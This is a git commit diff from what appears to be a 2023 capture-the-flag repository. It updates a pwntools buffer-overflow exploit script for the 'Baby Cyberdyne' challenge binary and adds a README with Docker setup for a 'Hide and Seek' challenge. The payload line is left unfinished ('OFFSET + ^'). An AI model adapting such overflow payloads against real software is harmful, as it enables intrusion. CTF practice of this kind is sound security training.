updates
This commit is contained in:
@@ -1,20 +1,24 @@
|
||||
from pwn import *
|
||||
elf = ELF(os.getcwd() + "/0d2dd2de6fc66a1b0e38dc299e38e0da")
|
||||
elf = ELF(os.getcwd() + "/baby")
|
||||
|
||||
gs = '''
|
||||
unset env LINES
|
||||
unset env COLUMNS
|
||||
set follow-fork-mode child
|
||||
br *handle_conn+631
|
||||
# br *main+420
|
||||
# br *0x5663c4b8
|
||||
br gets
|
||||
continue
|
||||
'''
|
||||
|
||||
def start():
|
||||
if args.GDB:
|
||||
return gdb.debug([elf.path], gs)
|
||||
return gdb.debug(elf.path, gs)
|
||||
else:
|
||||
return process([elf.path])
|
||||
|
||||
io = start()
|
||||
io.sendline()
|
||||
# io = start()
|
||||
# input("waiting...")
|
||||
OFFSET = 0x56555000
|
||||
with open("input", "wb+") as f:
|
||||
f.write(b'A'*42 + p32(1) + p32(0xd34db33f) + cyclic(cyclic_find('caaa')) + p32(OFFSET + ^))
|
||||
# io.interactive
|
||||
BIN
Unibw 2023/rev pwn/Baby Cyberdyne/baby
Executable file
BIN
Unibw 2023/rev pwn/Baby Cyberdyne/baby
Executable file
Binary file not shown.
BIN
Unibw 2023/rev pwn/Baby Cyberdyne/input
Normal file
BIN
Unibw 2023/rev pwn/Baby Cyberdyne/input
Normal file
Binary file not shown.
Binary file not shown.
16
Unibw 2023/rev pwn/Hide and Seek/README.md
Normal file
16
Unibw 2023/rev pwn/Hide and Seek/README.md
Normal file
@@ -0,0 +1,16 @@
|
||||
Hide and Seek
|
||||
|
||||
General Ashdown is bored of hiding his ass. He wants some action, but not the dangerous kind ... more some action like watching a duck swim.
|
||||
|
||||
9c6600421a497cfaf89a336e0cef2357
|
||||
|
||||
Hint: The challenge is build with for glibc (2.36-9) 2.36. If your terminal is crashing or hanging during execution, preload the needed libc or maybe better, just use docker, e.g.:
|
||||
|
||||
# Dockerfile
|
||||
FROM debian:bookworm
|
||||
|
||||
COPY ./9c6600421a497cfaf89a336e0cef2357 /
|
||||
|
||||
Build with: docker build -t chall .
|
||||
|
||||
Run with: docker run --name chall --rm -it chall bash
|
||||
Reference in New Issue
Block a user